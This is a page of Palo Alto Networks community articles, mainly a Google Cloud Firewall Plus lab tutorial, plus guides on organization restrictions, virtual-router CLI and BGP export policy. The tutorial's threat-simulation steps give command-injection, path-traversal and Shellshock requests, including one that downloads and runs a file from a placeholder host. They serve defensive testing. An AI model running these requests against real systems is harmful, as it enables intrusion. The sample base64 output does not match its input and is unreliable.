General Articles
LIVEcommunity's General Articles area is home to how-to resources, technical documentation, and discussions with Accepted Solutions that turn into articles related to all Palo Alto Networks products.
  Packet Buffer Protection is one of the first lines of defense. Find out why it's important and how it can improve your security posture.
This is a guide that shows how to deploy and use Google Cloud Firewall Plus, a native Google Cloud service powered by Palo Alto Networks Threat Prevention technologies.

Cloud Firewall is a fully distributed firewall service with advanced protection capabilities, micro-segmentation, and pervasive coverage to protect your Google Cloud workloads from internal and external threats, including intrusion, malware, spyware, and command-and-control. The service works by creating Google-managed zonal firewall endpoints that use packet intercept technology to transparently inspect the workloads for the configured threat signatures and protect them against threats.

[Diagram]

ℹ️ Note: Cloud Firewall Plus is currently in public preview. For the most recent version of this guide, please see the Google Cloud Firewall Plus Tutorial GitHub repository.

Requirements
- Familiarize yourself with Cloud Firewall Plus.
- A valid gcloud installation (SDK 447.0.0 or greater) or access to Google Cloud Shell.
- A Google Cloud project with Organizational admin access.

Topology
Below is a diagram of the environment. A VPC network contains two virtual machines (attacker and victim) that are used to simulate threats. Each virtual machine has an external address associated with its network interface to provide internet connectivity.

When Cloud Firewall Plus is enabled, Google Cloud firewall rules intercept VPC network traffic (including north-south and east-west) and redirect it to the Firewall Plus endpoint for inspection. All actions taken by the service are logged directly in the Google Cloud console for you.

[Topology diagram]

Prepare for deployment
Prepare for deployment by enabling the required APIs, retrieving the deployment files, and configuring the environment variables.

1. Open Google Cloud Shell and enable the required APIs.
gcloud services enable compute.googleapis.com
gcloud services enable networksecurity.googleapis.com

2. List your Organization ID(s).
gcloud organizations list

3. Set the desired Organization ID to the environment variable ORG_ID.
export ORG_ID=ORGANIZATION_ID

4. List your projects within the organization.
gcloud alpha projects list --organization=$ORG_ID

5. Set the desired Project ID to the environment variable PROJECT_ID.
export PROJECT_ID=PROJECT_ID

6. Set your Project ID in your gcloud configuration.
gcloud config set project $PROJECT_ID

7. Set values for the deployment's REGION, ZONE, and naming PREFIX.
export REGION=us-central1
export ZONE=us-central1-a
export PREFIX=panw

8. Select a deployment option. Both options deploy identical environments.
- Scripted Deployment: All of the cloud resources required for the tutorial are deployed using a single script. Best for users who are familiar with Cloud Firewall Plus and want to quickly test use-cases.
- Step-by-step Deployment: Each cloud resource is deployed individually through gcloud. Best for users who are new to Cloud Firewall Plus or want control over which resources are deployed.

Scripted Deployment

1. In Cloud Shell, clone the repository and change directories.
git clone https://github.com/PaloAltoNetworks/google-cloud-firewall-plus-tutorial
cd google-cloud-firewall-plus-tutorial

2. Execute the script to create the environment.
./ips_create.sh

3. When the script completes, proceed to Simulate threats without Cloud Firewall Plus.

Step-by-Step Deployment

1. In Cloud Shell, create a VPC network, subnetwork, and firewall rule to allow ingress traffic.
gcloud compute networks create $PREFIX-vpc \
  --subnet-mode=custom \
  --project=$PROJECT_ID

gcloud compute networks subnets create $PREFIX-subnet \
  --network=$PREFIX-vpc \
  --range=10.0.0.0/24 \
  --region=$REGION \
  --project=$PROJECT_ID

gcloud compute firewall-rules create $PREFIX-all-ingress \
  --network=$PREFIX-vpc \
  --direction=ingress \
  --allow=all \
  --source-ranges=0.0.0.0/0 \
  --project=$PROJECT_ID

2. Create two virtual machines (attacker and victim). The machines will be used to simulate pseudo-threats later.
gcloud compute instances create $PREFIX-attacker \
  --zone=$ZONE \
  --machine-type=f1-micro \
  --image-project=ubuntu-os-cloud \
  --image-family=ubuntu-2004-lts \
  --network-interface subnet=$PREFIX-subnet,private-network-ip=10.0.0.10 \
  --project=$PROJECT_ID

gcloud compute instances create $PREFIX-victim \
  --zone=$ZONE \
  --machine-type=f1-micro \
  --image-project=panw-gcp-team-testing \
  --image=debian-cloud-ids-victim \
  --network-interface subnet=$PREFIX-subnet,private-network-ip=10.0.0.20 \
  --project=$PROJECT_ID

3. Create a security profile and a security profile group.
gcloud beta network-security security-profiles threat-prevention create $PREFIX-profile \
  --location=global \
  --project=$PROJECT_ID \
  --organization=$ORG_ID \
  --quiet

gcloud beta network-security security-profile-groups create $PREFIX-profile-group \
  --threat-prevention-profile "organizations/$ORG_ID/locations/global/securityProfiles/$PREFIX-profile" \
  --location=global \
  --project=$PROJECT_ID \
  --organization=$ORG_ID \
  --quiet

4. Set the security profile's action to ALERT for threat severities categorized as INFORMATIONAL and LOW, and to DENY for those categorized as MEDIUM, HIGH, and CRITICAL.
gcloud beta network-security security-profiles threat-prevention add-override $PREFIX-profile \
  --severities=INFORMATIONAL,LOW \
  --action=ALERT \
  --location=global \
  --organization=$ORG_ID \
  --project=$PROJECT_ID

gcloud beta network-security security-profiles threat-prevention add-override $PREFIX-profile \
  --severities=MEDIUM,HIGH,CRITICAL \
  --action=DENY \
  --location=global \
  --organization=$ORG_ID \
  --project=$PROJECT_ID

5. Create a Firewall Plus Endpoint. The endpoint can take up to 25 minutes to fully provision.
gcloud beta network-security firewall-endpoints create $PREFIX-endpoint \
  --zone=$ZONE \
  --project=$PROJECT_ID \
  --organization=$ORG_ID \
  --quiet

while true; do
  STATUS_EP=$(gcloud beta network-security firewall-endpoints describe $PREFIX-endpoint \
    --zone=$ZONE \
    --project=$PROJECT_ID \
    --organization=$ORG_ID \
    --format="json" | jq -r '.state')
  if [[ "$STATUS_EP" == "ACTIVE" ]]; then
    echo "Firewall endpoint $PREFIX-endpoint is now active."
    sleep 2
    break
  fi
  echo "Waiting for the firewall endpoint to be created. This can take up to 25 minutes..."
  sleep 5
done

6. Associate the endpoint with a VPC network. The association can take up to 30 minutes to complete.
gcloud beta network-security firewall-endpoint-associations create $PREFIX-assoc \
  --endpoint "organizations/$ORG_ID/locations/$ZONE/firewallEndpoints/$PREFIX-endpoint" \
  --network=$PREFIX-vpc \
  --zone=$ZONE \
  --project=$PROJECT_ID \
  --quiet

while true; do
  STATUS_ASSOC=$(gcloud beta network-security firewall-endpoint-associations describe $PREFIX-assoc \
    --zone=$ZONE \
    --project=$PROJECT_ID \
    --format="json" | jq -r '.state')
  if [[ "$STATUS_ASSOC" == "ACTIVE" ]]; then
    echo "Endpoint association $PREFIX-assoc is now active."
    sleep 2
    break
  fi
  echo "Waiting for the endpoint association to be created. This can take up to 45 minutes..."
  sleep 1
done

7. Create a Network Firewall Policy with two firewall rules to allow all ingress and egress traffic to the workload network.
gcloud compute network-firewall-policies create $PREFIX-global-policy \
  --global \
  --project=$PROJECT_ID

gcloud compute network-firewall-policies rules create 10 \
  --action=allow \
  --firewall-policy=$PREFIX-global-policy \
  --global-firewall-policy \
  --direction=INGRESS \
  --enable-logging \
  --layer4-configs all \
  --src-ip-ranges=0.0.0.0/0 \
  --dest-ip-ranges=0.0.0.0/0 \
  --project=$PROJECT_ID

gcloud compute network-firewall-policies rules create 11 \
  --action=allow \
  --firewall-policy=$PREFIX-global-policy \
  --global-firewall-policy \
  --layer4-configs=all \
  --direction=EGRESS \
  --enable-logging \
  --src-ip-ranges=0.0.0.0/0 \
  --dest-ip-ranges=0.0.0.0/0 \
  --project=$PROJECT_ID

8. Associate the Network Firewall Policy with the VPC network created previously.
gcloud compute network-firewall-policies associations create \
  --firewall-policy=$PREFIX-global-policy \
  --network=$PREFIX-vpc \
  --name=$PREFIX-global-policy-association \
  --global-firewall-policy

9. (Optional) Review the created resources in the console:
- Firewall Endpoint
- Firewall Endpoint VPC Network Association
- Security Profile
- Network Firewall Policy

Simulate threats without Cloud Firewall Plus
Simulate several threats between the attacker and victim virtual machines without Cloud Firewall Plus inspection. Deep packet inspection does not occur because the firewall rules created in the previous step do not intercept traffic for inspection by the Firewall Plus endpoint.

[Diagram: without inspection]

1. In Cloud Shell, open an SSH session to the attacker VM.
gcloud compute ssh paloalto@$PREFIX-attacker --zone=$ZONE --project=$PROJECT_ID

2. From the attacker VM, simulate pseudo-threats against the victim (10.0.0.20) VM.
curl "http://10.0.0.20/weblogin.cgi?username=admin';cd /tmp;wget http://123.123.123.123/evil;sh evil;rm evil"
curl http://10.0.0.20/?item=../../../../WINNT/win.ini -m 5
curl http://10.0.0.20/cgi-bin/../../../..//bin/cat%20/etc/passwd -m 5
curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' -m 5 http://10.0.0.20/cgi-bin/test-critical -m 5

3. Attempt to download a pseudo-malicious file from the internet.
wget www.eicar.org/download/eicar.com.txt --tries 1 --timeout 2

💡 Objective: The above threat simulations should succeed. This is because the Firewall Endpoint is not inspecting the traffic between the attacker and victim virtual machines.

Prevent threats with Cloud Firewall Plus
Cloud Firewall Plus uses Google Cloud's packet intercept technology to transparently redirect traffic from workloads to firewall endpoints. Traffic redirection is defined within network firewall rules that reference the security profile group.

Update network firewall policies
Update the network firewall policy rules to redirect traffic to the firewall endpoint. The action defined in the firewall rule determines which security profile group is applied to the traffic.

[Diagram: with inspection via traffic intercept]

1. Modify the ingress and egress firewall rules within the global network policy to intercept traffic to the Firewall Plus endpoint.
gcloud beta compute network-firewall-policies rules update 10 \
  --action=apply_security_profile_group \
  --firewall-policy=$PREFIX-global-policy \
  --global-firewall-policy \
  --project=$PROJECT_ID \
  --security-profile-group=//networksecurity.googleapis.com/organizations/$ORG_ID/locations/global/securityProfileGroups/$PREFIX-profile-group

gcloud beta compute network-firewall-policies rules update 11 \
  --action=apply_security_profile_group \
  --firewall-policy=$PREFIX-global-policy \
  --global-firewall-policy \
  --project=$PROJECT_ID \
  --security-profile-group=//networksecurity.googleapis.com/organizations/$ORG_ID/locations/global/securityProfileGroups/$PREFIX-profile-group

Replay threats
Rerun the previous threat simulations to see the actions taken by Cloud Firewall Plus.

1. In Cloud Shell, open an SSH session to the attacker VM.
gcloud compute ssh paloalto@$PREFIX-attacker --zone=$ZONE --project=$PROJECT_ID

2. From the attacker VM, simulate pseudo-threats against the victim (10.0.0.20) VM.
curl "http://10.0.0.20/weblogin.cgi?username=admin';cd /tmp;wget http://123.123.123.123/evil;sh evil;rm evil"
curl http://10.0.0.20/?item=../../../../WINNT/win.ini -m 5
curl http://10.0.0.20/cgi-bin/../../../..//bin/cat%20/etc/passwd -m 5
curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' -m 5 http://10.0.0.20/cgi-bin/test-critical -m 5

3. Attempt to download a pseudo-malicious file from the internet.
wget www.eicar.org/download/eicar.com.txt --tries 1 --timeout 2

💡 Objective: The simulated threats from the attacker should fail. This is because the Firewall Plus service is preventing the exploits from reaching the victim machine.

View threats
All of the actions taken by Cloud Firewall Plus are logged directly to the Google Cloud console for you. These logs can be forwarded to Cortex XSIAM for further forensic investigation and action.

1. In the Google Cloud console, go to Network Security → Threats.

[Screenshot: cloud logs]

💡 Objective: You should see the actions taken by the Firewall Plus endpoint, indicating the service has detected and/or stopped the simulated threats. The action taken against a threat is determined by the security profile group applied to the network firewall rule.

Clean up
To delete the created resources, delete your Google Cloud deployment project. If you cannot delete your deployment project, follow the steps below to delete the resources created in this tutorial.

1. If you chose the Step-by-Step Deployment, clone the repository to Cloud Shell.
git clone https://github.com/PaloAltoNetworks/google-cloud-firewall-plus-tutorial
cd google-cloud-firewall-plus-tutorial

2. Execute the script to delete the created resources.
./ips_delete

More Information
Please see the materials below for more information about the topics discussed in this tutorial.
- Announcement: Palo Alto Networks with Google Cloud Firewall
- Palo Alto Networks with Google Cloud
- Cloud Firewall Plus Overview
- Configure Intrusion Prevention Service
This Nominated Discussion Article is based on the post "Migrating PA-5050 to PA-5410".
In this article, we will look at how to identify the VM-Series versions based on the PAN-OS version and licensing model, how to deploy a specific version of VM-Series and then also how we can deploy the same through automation.  
Palo Alto Networks' Commit and Config Locks are important features that help ensure the integrity of network configurations and prevent unauthorized changes.
Introduction
Security administrators can use Google Cloud IAM to control who can access resources within a Google Cloud organization. However, companies may also need to restrict access to resources and APIs that reside in different Google Cloud organizations. Combining Palo Alto Networks URL Filtering with Google Cloud organization restrictions lets security teams restrict employee access to sanctioned Google Cloud organizations. The capability provides a variety of security benefits, including preventing insider attacks and stopping data exfiltration.

Use-Cases
There are many use-cases for organization restrictions, for example:
- In combination with Palo Alto Networks URL Filtering, you can monitor and control the sites users can access, prevent phishing attacks by controlling the sites to which users can submit valid corporate credentials, and enforce safe search for search engines like Google.
- You can restrict access so employees can only access resources in your Google Cloud organization and not other organizations.
- You can allow your employees read-only access to any Cloud Storage resources, but restrict all other types of access to only resources in your Google Cloud organization.
- You can allow your employees to access a vendor's Google Cloud organization in addition to your Google Cloud organization.

How it works
The diagram below shows the components required to enforce organization restrictions. When a managed device accesses a Google Cloud resource, the URL Filtering profile defined within the security policy inserts the value for the organization restrictions header, X-Goog-Allowed-Resources.

[Diagram]

- Managed device: Any device that adheres to the organizational policies of the company and is connected to, or routed through, a Palo Alto Networks enforcement point with URL Filtering enabled. For example, the managed device can be a remote user connected with GlobalProtect, a datacenter server protected by a PA-Series NGFW, or cloud resources protected by a VM-Series NGFW.
- Palo Alto Networks URL Filtering: A URL Filtering profile is created and attached to the security policy. The profile inserts the organization restriction as a custom header for any requests originating from the managed device. This configuration prevents users and devices from accessing any Google Cloud resources that reside in unsanctioned Google Cloud organizations.
- Google Cloud: The organization restrictions feature in Google Cloud inspects all requests for the organization restrictions header, and allows or denies the requests based on the organization being accessed.

Example Scenario
The network security administrator of Organization A wants to allow employee access to resources hosted in their Google Cloud organization. All employee access to cloud resources hosted in all other Google Cloud organizations should be denied.

Configuration
A cloud and network security administrator for Organization A performs the following steps to implement organization restrictions.

1. Retrieve the Google Cloud organization ID for Organization A.
gcloud organizations list
(output)
DISPLAY_NAME: Organization A
ID: 0123456
DIRECTORY_CUSTOMER_ID: a1b2c3d4

2. Create a JSON representation of the value that will be assigned to the organization restriction header, X-Goog-Allowed-Resources, and save it to a file named authorized_orgs.json. Please see Configure organization restrictions for complete information on constructing the value for the header.
{
  "resources": ["organizations/0123456"],
  "options": "strict"
}

3. Encode the header value in base64 format. Below is an example using basenc. The URL Filtering profile will insert the base64 string as the value for the X-Goog-Allowed-Resources header.
cat authorized_orgs.json | basenc --base64url -w0
(output)
fdsasdfInJlc291cmNlasjdfaJnYW5pemF0ay8xMjM0NTY3ODkiXSwKICJvcHRpb25zIjogInN0cmljdCIKfQo

4. If there are no upstream devices decrypting HTTPS traffic, configure SSL Forward Proxy.

5. On the Palo Alto Networks device, edit or create a URL Filtering profile. In the profile, click HTTP Header Insertion → Add to create a new entry. Configure the entry as follows:
Header: X-Goog-Allowed-Resources
Value: the base64-encoded value from the previous step.

6. Apply the URL Filtering profile to the security policy that inspects the managed device's internet traffic.

7. Commit the changes.

Verify Configuration
The organization restrictions apply to access to the Google Cloud APIs and the Google Cloud console. On a managed device that has access to both Organization A and Organization B, perform the following to test the organization restrictions feature.

1. On the managed device, log into the Google Cloud Console with an account that has access to Organization A and Organization B.

2. In the Console, click the Organization drop-down menu. Even though the user account on the managed device has access to Organization A and Organization B, only Organization A appears in the Google Cloud Console. This is because the URL Filtering profile inserts the organization restriction header, which lets Google Cloud block the user from accessing other organizations.

3. From the same managed device, attempt to reach the logging API of a Google Cloud project (e.g. org-a-project) that belongs to Organization A. The request should succeed and return the log entries within the Google Cloud project belonging to Organization A.
TOKEN=$(gcloud auth print-access-token)
curl -X POST -d '{"projectIds": ["org-a-project"]}' \
  -H 'Content-Type: application/json' \
  -H "Authorization: Bearer ${TOKEN}" \
  "https://logging.googleapis.com/v2/entries:list"
(output)
{
  [ <..redacted..> ]
  nextPageToken": "EAB<..redacted..>RsAB"
}

4. Attempt to reach the logging API of a Google Cloud project (e.g. org-b-project) that does not belong to Organization A. The request should fail, because the URL Filtering profile inserted the organization restriction header into the managed device's request.
curl -X POST -d '{"projectIds": ["org-b-project"]}' \
  -H 'Content-Type: application/json' \
  -H "Authorization: Bearer ${TOKEN}" \
  "https://logging.googleapis.com/v2/entries:list"
(output)
{
  "error": {
    "code": 403,
    "message": "Access denied by organization restriction. Please contact your administrator for additional information.",
    "status": "PERMISSION_DENIED",
    "details": [{
      "@type": "type.googleapis.com/google.rpc.ErrorInfo",
      "reason": "ORG_RESTRICTION_VIOLATION",
      "domain": "googleapis.com",
      "metadata": {
        "consumer": "projects/01234567890",
        "service": "logging.googleapis.com"
      }
    }]
  }
}

Additional Materials
- Google Cloud: Introduction to organization restrictions
- Google Cloud: Configure organization restrictions
- Palo Alto Networks: HTTP Header Insertion
- Palo Alto Networks: Create Custom HTTP Header Insertion Entries
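The following Python is an added example (not part of the article) that covers the header-building step and the verification step above: it builds the X-Goog-Allowed-Resources value from organization IDs the same way the authorized_orgs.json plus basenc pipeline does, decodes a configured value so it can be reviewed before it is committed to the URL Filtering profile, and recognises the ORG_RESTRICTION_VIOLATION rejection in an API response. The "non-strict" option value comes from Google's organization restrictions documentation, not from this article.

```python
"""Build, review and interpret the X-Goog-Allowed-Resources header value.

Added example; the header name, JSON shape and 403 body follow the article.
"""
import base64
import json

HEADER_NAME = "X-Goog-Allowed-Resources"


def build_header_value(org_ids, strict=True):
    """Return the base64url-encoded JSON the firewall inserts as the header value.

    Same shape as the article's authorized_orgs.json:
    {"resources": ["organizations/<ID>", ...], "options": "strict"}.
    "non-strict" is the other option value from Google's documentation
    (assumption: the article itself only shows "strict").
    """
    if not org_ids:
        raise ValueError("at least one organization ID is required")
    payload = {
        "resources": ["organizations/%s" % org_id for org_id in org_ids],
        "options": "strict" if strict else "non-strict",
    }
    raw = json.dumps(payload, separators=(",", ":")).encode("utf-8")
    # urlsafe_b64encode is RFC 4648 base64url with '=' padding, which is
    # what `basenc --base64url -w0` in the article produces as well.
    return base64.urlsafe_b64encode(raw).decode("ascii")


def decode_header_value(value):
    """Decode a configured header value so an admin can review what it allows.

    Raises ValueError when the value is not the JSON shape Google expects.
    """
    padded = value + "=" * (-len(value) % 4)  # tolerate stripped padding
    try:
        doc = json.loads(base64.urlsafe_b64decode(padded.encode("ascii")))
    except ValueError as exc:  # binascii.Error and JSONDecodeError both subclass it
        raise ValueError("header value is not base64url-encoded JSON") from exc
    if not isinstance(doc, dict):
        raise ValueError("header value must decode to a JSON object")
    resources = doc.get("resources")
    if not isinstance(resources, list) or not resources:
        raise ValueError('"resources" must be a non-empty list')
    for res in resources:
        if not (isinstance(res, str) and res.startswith("organizations/")):
            raise ValueError("resource %r is not of the form organizations/<ID>" % res)
    if doc.get("options") not in ("strict", "non-strict"):
        raise ValueError('"options" must be "strict" or "non-strict"')
    return doc


def is_org_restriction_denial(response):
    """True when an API error body is Google's organization-restriction rejection.

    Matches the 403 shown in the article: error.details[] carries an
    ErrorInfo whose reason is ORG_RESTRICTION_VIOLATION.
    """
    error = response.get("error") or {}
    if error.get("code") != 403:
        return False
    return any(
        detail.get("reason") == "ORG_RESTRICTION_VIOLATION"
        for detail in error.get("details", [])
        if isinstance(detail, dict)
    )


# Constructed sample: the article's 403 body, trimmed to the fields used here.
DENIED_RESPONSE = {
    "error": {
        "code": 403,
        "status": "PERMISSION_DENIED",
        "details": [{
            "@type": "type.googleapis.com/google.rpc.ErrorInfo",
            "reason": "ORG_RESTRICTION_VIOLATION",
            "domain": "googleapis.com",
        }],
    }
}

if __name__ == "__main__":
    value = build_header_value(["0123456"])
    print("%s: %s" % (HEADER_NAME, value))
    print(decode_header_value(value))
    print(is_org_restriction_denial(DENIED_RESPONSE))
```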
This Nominated Discussion Article is based on the post "CLI configuration of adding interface to virtual router" by @nowayout and responded to by @aleksandar.astardzhiev. Read on to see the discussion and solution!

When adding an interface into a VR using the CLI, do I need to copy all the existing interfaces currently in the VR and then add this new interface into the list?

For example, the current default virtual router has two interfaces, ethernet1/1 and ethernet1/2. I want to add another interface, ethernet1/3. Do I only need to do "set network virtual-router default interface [ ethernet1/3 ]", or do I have to do "set network virtual-router default interface [ ethernet1/1 ethernet1/2 ethernet1/3 ]"? If the latter, it will involve some programming work when doing automation in a real-world environment, as we don't know what interfaces are already in the virtual router, so we need to get the list first, add the interface to the list, and then issue the set command.

You don't need to list existing interfaces when adding a new one to a virtual router. If you run the following command it will add to the existing list and will not override it:

> set network virtual-router default interface ethernet1/3

The square brackets are optional in your case; they are needed if you want to add multiple interfaces with a single command.

Even if you are adding multiple interfaces with [ ethernet1/4 ethernet1/5 ethernet1/6 ], it will still only add those three without overriding or removing any interface from the list.

Now if you want to remove interface(s) from the list, you either remove interfaces one by one or all interfaces at once:

# will remove only one interface from the list and the rest will remain
> delete network virtual-router default interface ethernet1/3
# will remove all interfaces from the virtual router
> delete network virtual-router default interface
This Nominated Discussion Article is based on the post "What happens when a base image is deleted from PAN OS".
Real-time retrieval of WildFire signatures, WildFire Inline ML and Advanced Wildfire that are available for Palo Alto NGFW and Prisma Access SASE.
The Palo Alto NGFW is a really stable device but sometimes there is a need to restart a process as a workaround for a bug causing high CPU or Memory leakage. How can we automate this process? 
This article is based on a discussion, "How to implement BGP and eBGP on Palo". Read on to see @rkvsenthil's guidance on configuring BGP below.   Hi, I am migrating WatchGuard to Palo and there seems to be a lot more configuration options on the Palo.    WatchGuard configuration is below. What is the best way to configure this within Palo? Where is the option to set default-originate?   router bgp 64801 bgp router-id 169.254.3.3 timers bgp 4 12 neighbor 10.200.34.2 remote-as 64601 neighbor 10.200.34.3 remote-as 64601 neighbor 10.200.52.2 remote-as 64601 neighbor 10.200.52.3 remote-as 64601 neighbor 10.200.64.130 remote-as 64601 neighbor 10.200.64.131 remote-as 64601 neighbor 10.200.34.2 default-originate neighbor 10.200.34.3 default-originate neighbor 10.200.52.2 default-originate neighbor 10.200.52.3 default-originate neighbor 10.200.64.130 default-originate neighbor 10.200.64.131 default-originate neighbor 10.200.34.2 ebgp-multihop 4 neighbor 10.200.34.3 ebgp-multihop 4 neighbor 10.200.52.2 ebgp-multihop 4 neighbor 10.200.52.3 ebgp-multihop 4 neighbor 10.200.64.130 ebgp-multihop 4 neighbor 10.200.64.131 ebgp-multihop 4   BGP Config template:   For default-originate -- In GUI,, go to Network -- Virtual Router --  <VR name or default> --- BGP --- Redist Rule and  add a Redistribution rule for ip subnet 0.0.0.0/0 and enable "Allow Redistribute Default route" option ..   Also,, use the below config example as template. This should give you clues on how and where, you can change the timer settings and TTL value (ebgp-multihop), etc..   
admin@PAFW1> configure set network virtual-router default protocol bgp enable yes set network virtual-router default protocol bgp routing-options graceful-restart enable yes set network virtual-router default protocol bgp peer-group stub_ebgp_peers type ebgp remove-private-as no set network virtual-router default protocol bgp peer-group stub_ebgp_peers type ebgp import-nexthop original set network virtual-router default protocol bgp peer-group stub_ebgp_peers type ebgp export-nexthop resolve set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 peer-address ip 10.0.18.2 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options incoming-bgp-connection remote-port 0 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options incoming-bgp-connection allow yes set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options outgoing-bgp-connection local-port 0 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options outgoing-bgp-connection allow yes set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options multihop 0 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options keep-alive-interval 30 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options open-delay-time 0 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options hold-time 90 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options idle-hold-time 15 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options min-route-adv-interval 30 set network 
virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 subsequent-address-family-identifier unicast yes set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 subsequent-address-family-identifier multicast no set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 local-address ip 10.0.18.1/30 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 local-address interface ethernet1/1 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 bfd profile Inherit-vr-global-setting set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 max-prefixes 5000 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 enable yes set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 peer-as 64513 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 enable-mp-bgp no set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 address-family-identifier ipv4 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 enable-sender-side-loop-detection no set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 reflector-client non-client set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 peering-type unspecified set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 peer-address ip 100.100.100.1 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options incoming-bgp-connection remote-port 0 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options incoming-bgp-connection allow yes set 
network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options outgoing-bgp-connection local-port 0
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options outgoing-bgp-connection allow yes
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options multihop 4
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options keep-alive-interval 30
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options open-delay-time 0
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options hold-time 90
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options idle-hold-time 15
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options min-route-adv-interval 30
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 subsequent-address-family-identifier unicast yes
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 subsequent-address-family-identifier multicast no
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 local-address ip 192.168.102.2/30
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 local-address interface ethernet1/2
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 bfd profile Inherit-vr-global-setting
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 max-prefixes 5000
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 enable yes
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 peer-as 64512
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 enable-mp-bgp no
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 address-family-identifier ipv4
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 enable-sender-side-loop-detection no
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 reflector-client non-client
set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 peering-type bilateral
set network virtual-router default protocol bgp peer-group stub_ebgp_peers aggregated-confed-as-path yes
set network virtual-router default protocol bgp peer-group stub_ebgp_peers soft-reset-with-stored-info yes
set network virtual-router default protocol bgp peer-group stub_ebgp_peers enable yes
set network virtual-router default protocol bgp reject-default-route no
set network virtual-router default protocol bgp allow-redist-default-route yes
set network virtual-router default protocol bgp router-id 192.168.102.2
set network virtual-router default protocol bgp local-as 65535
set network virtual-router default protocol bgp redist-rules 0.0.0.0/0 address-family-identifier ipv4
set network virtual-router default protocol bgp redist-rules 0.0.0.0/0 enable yes
set network virtual-router default protocol bgp redist-rules 0.0.0.0/0 set-origin incomplete
set network virtual-router default protocol bgp policy export rules default-route-only action allow update as-path none
set network virtual-router default protocol bgp policy export rules default-route-only action allow update origin incomplete
set network virtual-router default protocol bgp policy export rules default-route-only action allow update community none
set network virtual-router default protocol bgp policy export rules default-route-only action allow update extended-community none
set network virtual-router default protocol bgp policy export rules default-route-only match address-prefix 0.0.0.0/0 exact no
set network virtual-router default protocol bgp policy export rules default-route-only match route-table unicast
set network virtual-router default protocol bgp policy export rules default-route-only used-by stub_ebgp_peers
set network virtual-router default protocol bgp policy export rules default-route-only enable yes
[edit]
admin@PAFW1# commit
Commit job 6 is in progress. Use Ctrl+C to return to command prompt
..........100%
Configuration committed successfully
[edit]
admin@PAFW1# run show routing protocol bgp rib-out
VIRTUAL ROUTER: default (id 1)
==========
Prefix            Nexthop        Peer           Originator  Adv Status  Aggr Status     AS-Path
0.0.0.0/0         10.0.18.1      upstream_R5    0.0.0.0     advertised  no aggregation  65535
192.168.100.0/30  10.0.18.1      upstream_R5    0.0.0.0     advertised  no aggregation  65535,64512
192.168.101.0/30  10.0.18.1      upstream_R5    0.0.0.0     advertised  no aggregation  65535,64512
0.0.0.0/0         192.168.102.2  inside_core_2  0.0.0.0     advertised  no aggregation  65535
5.5.5.5/32        192.168.102.2  inside_core_2  0.0.0.0     advertised  no aggregation  65535,64513
total routes shown: 5

With exact no, the match address-prefix 0.0.0.0/0 condition matches every IPv4 prefix contained in 0.0.0.0/0, so the export rule named default-route-only actually advertises the whole table. Setting exact yes restricts the match to the default route itself:

[edit]
admin@PAFW1# set network virtual-router default protocol bgp policy export rules default-route-only match address-prefix 0.0.0.0/0 exact yes
[edit]
admin@PAFW1# commit
Commit job 6 is in progress. Use Ctrl+C to return to command prompt
..........100%
Configuration committed successfully
[edit]
admin@PAFW1# run show routing protocol bgp rib-out
VIRTUAL ROUTER: default (id 1)
==========
